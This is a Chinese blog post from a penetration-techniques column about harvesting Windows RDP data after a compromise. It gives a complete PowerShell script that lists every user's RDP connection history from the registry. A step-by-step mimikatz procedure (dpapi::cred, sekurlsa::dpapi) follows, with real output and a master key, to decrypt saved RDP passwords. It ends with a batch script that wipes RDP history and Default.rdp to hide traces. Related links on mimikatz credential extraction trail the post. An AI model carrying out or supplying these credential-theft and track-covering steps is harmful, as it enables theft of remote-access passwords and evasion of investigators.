windows获取RDP连接记录

最新推荐文章于 2024-06-12 13:41:23 发布
最新推荐文章于 2024-06-12 13:41:23 发布
阅读量5.7k 收藏 7
点赞数 3
分类专栏: 渗透技巧 文章标签: 渗透技巧
我希望自己永远怀着一颗学习的心!
本文链接:https://blog.csdn.net/q1352483315/article/details/100075078
版权

0x01 获取RDP连接历史记录:

以下代码为3gStudent实现的获取连接记录的代码:

<#
.SYNOPSIS
This script will list the logged-in users' RDP Connections History.
Author: 3gstudent@3gstudent
License: BSD 3-Clause
#>
$AllUser = Get-WmiObject -Class Win32_UserAccount
foreach($User in $AllUser)
{
	$RegPath = "Registry::HKEY_USERS\"+$User.SID+"\Software\Microsoft\Terminal Server Client\Servers\"
	Write-Host "User:"$User.Name
	Write-Host "SID:"$User.SID
	Write-Host "Status:"$User.Status
	Try  
    	{ 
		$QueryPath = dir $RegPath -Name -ErrorAction Stop
	}
	Catch
	{
		Write-Host "No RDP Connections History"
		Write-Host "----------------------------------"
		continue
	}
	foreach($Name in $QueryPath)
	{   
		Try  
    		{  
    			$User = (Get-ItemProperty -Path $RegPath$Name -ErrorAction Stop).UsernameHint
    			Write-Host "User:"$User
    			Write-Host "Server:"$Name
    		}
    		Catch  
    		{
			Write-Host "No RDP Connections History"
    		}
	}
	Write-Host "----------------------------------"	
}

用法:powershell xxx.ps1

0x02 破解RDP连接凭证:

破解RDP连接凭证的前提是用户在连接远程主机时勾选了保存保存凭证。
在这里插入图片描述

1、查找本地的Credentials

dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*

在这里插入图片描述

2、使用mimikatz进行操作

mimikatz dpapi::cred /in:C:\Users\dell\AppData\Local\Microsoft\Credentials\AB07963F1A0A1CB56827E93395597FC6

得到:

mimikatz # dpapi::cred /in:C:\Users\dell\AppData\Local\Microsoft\Credentials\AB07963F1A0A1CB56827E93395597FC6
**BLOB**
  dwVersion          : 00000001 - 1
  guidProvider       : {df9d8cd0-1501-11d1-8c7a-00c04fc297eb}
  dwMasterKeyVersion : 00000001 - 1
  guidMasterKey      : {ffc994a1-de8d-4304-9416-31e587f7a8ca}
  dwFlags            : 20000000 - 536870912 (system ; )
  dwDescriptionLen   : 00000030 - 48
  szDescription      : Local Credential Data

  algCrypt           : 00006610 - 26128 (CALG_AES_256)
  dwAlgCryptLen      : 00000100 - 256
  dwSaltLen          : 00000020 - 32
  pbSalt             : 00fed8ca7ec6d44585dd1fbd8b57e77b6ab0cf318ec5d52d09fd0694ffb89ccb
  dwHmacKeyLen       : 00000000 - 0
  pbHmackKey         :
  algHash            : 0000800e - 32782 (CALG_SHA_512)
  dwAlgHashLen       : 00000200 - 512
  dwHmac2KeyLen      : 00000020 - 32
  pbHmack2Key        : b49ef55f909fa503eda37ddc797c83c99df983920bfb4628e07aac5cb32bb530
  dwDataLen          : 000000b0 - 176
  pbData             : 4083f8f501b999a35c4aa57ce732bf52d30a6e604dac5a91b6fd3e65660c52a536025c5126f0d12b85044498deef08a8688b3459f49514ed6ae46271a1cb4cd0e70845d9b6beccbcbe85dead0fb7c80b4f7810add87b75c48592fcbfbbfd94fa4eee8004f8cf6d9619ef4b9af643f4c9ef0e8a2a5b0cd00530a5638cfd114fee4b735ac12eef2c7e6a0364845eb0ee4b3ab121e33324f8d5af48f3422bd47a76ab5e9e9e5a1a383e22fff8bf851b6a2a
  dwSignLen          : 00000040 - 64
  pbSign             : 7c8dbe7991c6af4d3bfc9f808790a0904738d0ca227bc2ee20ee26cbf06487dd2679e932b27ea0c0cbbe590ee6430641605d7001b2158c8873c5d6a09a9855a8

接下来需要使用的就是guidMasterKey、pbData数据。pbData是凭据的加密数据,guidMasterKey是凭据的GUID

3、使用sekurlsa::dpapi

mimikatz privilege::debug sekurlsa::dpapi

在这里插入图片描述

根据目标凭据GUID: {ffc994a1-de8d-4304-9416-31e587f7a8ca}找到其关联的MasterKey,这个MasterKey就是加密凭据的密钥,即解密pbData所必须的东西。

4、解密

dpapi::cred /in:C:\Users\dell\AppData\Local\Microsoft\Credentials\AB07963F1A0A1CB56827E93395597FC6 /masterkey:e01320a53bf9d57da1163c7723a5b3901df5a3fc8e504fc021def2637d19d34c0084a3ac2a0daab3fb9af3f98c48a9a901627dc4b10db087cb357e1d2f8aa18c

下面这段MasterKey:
e01320a53bf9d57da1163c7723a5b3901df5a3fc8e504fc021def2637d19d34c0084a3ac2a0daab3fb9af3f98c48a9a901627dc4b10db087cb357e1d2f8aa18c

在这里插入图片描述

0x03 清除RDP连接历史记录:

注册表HKCU:\Software\Microsoft\Terminal Server Client\

针对上述的Default、Server,对其表项进行删除

在这里插入图片描述
tips:由于在删除Server表项的时候无法一次选择所有表项,因为可以直接删除整个Server再新建。

然后删除默认的rdp连接文件:

@echo off
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f # 删除Default中的所有值
reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" /f # 删除整个Servers
reg add "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers" 重新创建删除的注册表项
cd %userprofile%\documents\ # 转到Default.rdp文件目录
attrib Default.rdp -s -h # 更改Default.rdp文件属性,默认情况下它是隐藏
del Default.rdp  # 删除文件Default.rdp文件

以上参考链接:https://rcoil.me/2018/05/%E5%85%B3%E4%BA%8Ewindows%E7%9A%84RDP%E8%BF%9E%E6%8E%A5%E8%AE%B0%E5%BD%95/

小鱼儿waha
关注
  • 3
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Python-获得Windows系统的远程桌面连接历史记录
08-10
使用powershell列出登录用户或所有用户的RDP连接历史记录
001.PDF.渗透技巧——获得Powershell命令的历史记录3gstudent1
08-03
1. 常用命令 2. 利用思路 2.导出历史记录 3. 补充:查看cmd.exe的历史记录 1. Powershell v3和Powershell v4的安装和
一款基于go的windows信息收集工具,主要收集目标机器rdp端口、mstsc远程连接记录
05-24
一款基于go的windows信息收集工具,主要收集目标机器rdp端口、mstsc远程连接记录、mstsc密码和安全事件中4624、4625登录事件记录Go语言(也称为Golang)是由Google开发的一种静态强类型、编译型的编程语言。它旨在成为一门简单、高效、安全和并发的编程语言,特别适用于构建高性能的服务器和分布式系统。以下是Go语言的一些主要特点和优势: 简洁性:Go语言的语法简单直观,易于学习和使用。它避免了复杂的语法特性,如继承、重载等,转而采用组合和接口来实现代码的复用和扩展。 高性能:Go语言具有出色的性能,可以媲美C和C++。它使用静态类型系统和编译型语言的优势,能够生成高效的机器码。 并发性:Go语言内置了对并发的支持,通过轻量级的goroutine和channel机制,可以轻松实现并发编程。这使得Go语言在构建高性能的服务器和分布式系统时具有天然的优势。 安全性:Go语言具有强大的类型系统和内存管理机制,能够减少运行时错误和内存泄漏等问题。它还支持编译时检查,可以在编译阶段就发现潜在的问题。 标准库:Go语言的标准库非常丰富,包含了大量的实用功能和工具,如网络编程、文件操作、加密解密等。这使得开发者可以更加专注于业务逻辑的实现,而无需花费太多时间在底层功能的实现上。 跨平台:Go语言支持多种操作系统和平台,包括Windows、Linux、macOS等。它使用统一的构建系统(如Go Modules),可以轻松地跨平台编译和运行代码。 开源和社区支持:Go语言是开源的,具有庞大的社区支持和丰富的资源。开发者可以通过社区获取帮助、分享经验和学习资料。 总之,Go语言是一种简单、高效、安全、并发的编程语言,特别适用于构建高性能的服务器和分布式系统。如果你正在寻找一种易于学习和使用的编程语言,并且需要处理大量的并发请求和数据,那么Go语言可能是一个不错的选择。
2024最新最全【VNC Viewer】零基础入门到精通,看完这一篇就够了!
最新发布
程序员阿飘 的博客
06-12 2222
由于kali官方的Nethunter2的安装代码因为…无法访问,手头又没有一些受支持的机器3,所以做了这个脚本,供大家使用。
w ndows相机控制协议,3gstudent-Blog
weixin_32127359的博客
05-24 171
22 Mar 20210x00 前言 在之前的文章《Exchange Web Service(EWS)开发指南2——SOAP XML message》介绍了SOAP XML message的使用,通过Python实现了利用hash对Exchange资源的访问。 当我们通过SOAP XML message读取邮件时,尝尝会遇到以下麻烦:由于每一封邮件对应一份原始的XML文件,原始的XML文件包含完整...
导出Chrome浏览器中保存的密码
摔不死的笨鸟的博客
09-18 3129
https://3gstudent.github.io/3gstudent.github.io/渗透技巧-导出Chrome浏览器中保存的密码/ 参考Chromium开源代码,找到Chrome做二次加密的方法: 通过Windows API CryptProtectData()实现 参考加密代码: https://github.com/scheib/chromium/blob/eb7e2441dd88...
内网渗透测试:获取远程桌面连接记录RDP 凭据
qq_53058639的博客
08-20 786
Windows 远程桌面是用于管理 Windows服务器的最广泛使用的工具之一。管理员喜欢使用远程桌面,攻击者也喜欢使用(狗头)。在之前的文章中我们已经介绍了很多攻击远程桌面的方法,本篇文章我们继续来探究。在渗透测试中,RDP远程桌面连接的历史记录不可忽视,根据历史连接记录我们往往能够定位出关键的服务器。并且,当我们发现了某台主机上存在远程桌面的连接记录,我们还可以想办法获取其远程桌面登录历史的连接凭据。用于登录RDP 远程桌面会话的凭据通常具有特权,这使它们成为红队操作期间的完美目标。
RDP日志溯源教程
安全杂货铺
09-29 9085
1.查看登陆过本机的IP 1.1打开事件事件日志 我的电脑 -&gt; 右键 -&gt; 管理 -&gt; 事件查看器。 1.2找到RDP连接日志 应用程序和服务日志 -&gt; Microsoft -&gt; Windows -&gt; TerminalServices-RemoteConnectionManager 选中Operational,右边就出现了RDP的日志信息,点击操作窗口筛选...
ListRDPConnections:C#读取本机对外RDP连接记录和其他主机该主机的连接记录,从而内部网渗透获取更多可通内网网段信息以及定位运维管理人员主机
03-20
ListRDPConnections简介C#读取本机对外RDP连接记录和其他主机该主机的连接记录,从而内部网渗透获取更多可通内网网段信息以及定位运维管理人员主机原理对外RDP连接记录对外RDP连接记录保存在HKEY_USERS\[SID]\...
SharpRDPLog:Windows rdp相关的登录记录导出工具,可用于后渗透Windows服务器的信息收集阶段。输出内容包括:本地rdp端口、mstsc缓存、cmdkey缓存、登录成功、失败日志事件
05-29
Windows rdp相关的登录记录导出工具,用于后渗透Windows服务器的RDP相关的信息收集。输出内容包括:本地rdp端口、mstsc缓存、cmdkey缓存、登录成功、失败日志事件。 运行前需要bypassUAC后的管理员权限权限 说明 ...
删除远程连接记录.rar
09-23
"删除远程连接记录.rar" 是一个压缩包,其中包含一个批处理(BAT)脚本,用于自动清除与远程桌面连接相关的各种历史记录,以保护用户隐私和增强系统安全性。以下是该主题涉及的主要知识点: 1. **远程桌面连接**:...
windrpm:Windows 2019 RDP由Mkastro To SA
04-04
1. **Windows Server 2019 RDP**: RDP是微软提供的远程桌面服务,允许用户通过网络连接到另一台计算机上进行操作。理解RDP的工作原理、配置选项以及安全性设置是必要的。 2. **RDP优化**: 项目可能涉及到如何提升...
Win7删除远程连接记录的方法
10-24
3. 安全地删除`default.rdp`文件,这样系统将不再保存任何远程桌面连接记录。 另一种方法是利用Windows自带的“远程桌面连接”程序(mstsc)的缓存清理功能: 1. 启动注册表编辑器,同样导航至`HKEY_CURRENT_USER\...
Win7 64位 RDP升级到8.1.zip
11-08
RDP是微软提供的一项功能,允许用户通过网络连接到另一台计算机,从而实现远程控制和访问桌面环境。 描述中提到,“升级补丁包,安装后重启就可以了”,这表明这个zip文件内包含了一个补丁程序,用户只需下载、安装...
WindowsPC端远程控制软件
05-18
Windows远程控制通常基于Microsoft的远程桌面协议(RDP,Remote Desktop Protocol),这是一个内置在Windows操作系统中的功能,允许授权用户从远程位置访问个人桌面。除了RDP,市场上还有许多第三方远程控制软件,如...
Windows Server 2008系统管理视频教程csdn.txt
04-04
11-12配置远程桌面服务器RDP属性03:08 11-13远程桌面会话限制09:06 11-14限制一个用户一个会话01:16 11-15介绍终端服务和终端服务 每用户 每设备许可证05:18 11-16安装终端服务02:55 11-17安装终端服务02:55 11-18...
【源码阅读】Mimikatz一键获取远程终端凭据与获取明文密码修改方法
17bdw的编程备份笔记
02-16 74
1、前言 mimikatz框架是非常精妙的,粗浅讲一下修改的思路。 它的模块主要由各个结构体数组组成,根据传入的命令搜索执行相应命令的模块 mimikatz.c 部分代码: NTSTATUS mimikatz_doLocal(wchar_t * input) { NTSTATUS status = STATUS_SUCCESS; // 参数个数定义 ...
利用mimikatz查看rdp连接密码【渗透测试】
热门推荐
leeezp的博客
09-22 29万+
在使用 rdp 时会发现系统有保存连接密码的功能,一定在本地以一种加密方式保存,在连接的时候解密进行rdp尝试,那么我们能不能那到加密的密码解密以获取这台机器rdp连接过的机器呢?UserName就是账户,CredentialBlob 字段值是解密后的密码,如果是空,就尝试 Credentials 目录下其他凭据的值。(毕竟渗透也是个苦力活...)可以保存rdp凭据,ssh凭据等连接凭据。接下来就一个一个实验吧,因为这个下面是凭据的值,不一定哪一个是你要的,需要写工具批量查喽。
11--使用 mimikatz 提取 windows凭据的密码
SunShine
06-28 3万+
mimikatz一.mimikatz简介  是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。作者主页:http://...
windows 10 RDP的版本
06-10
Windows 10操作系统支持多个版本的RDP协议,具体版本取决于Windows 10的版本...因此,在使用RDP连接Windows 10时,建议使用最新的RDP客户端,并在Windows 10上安装最新的更新补丁,以确保获得最佳的连接性能和稳定性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值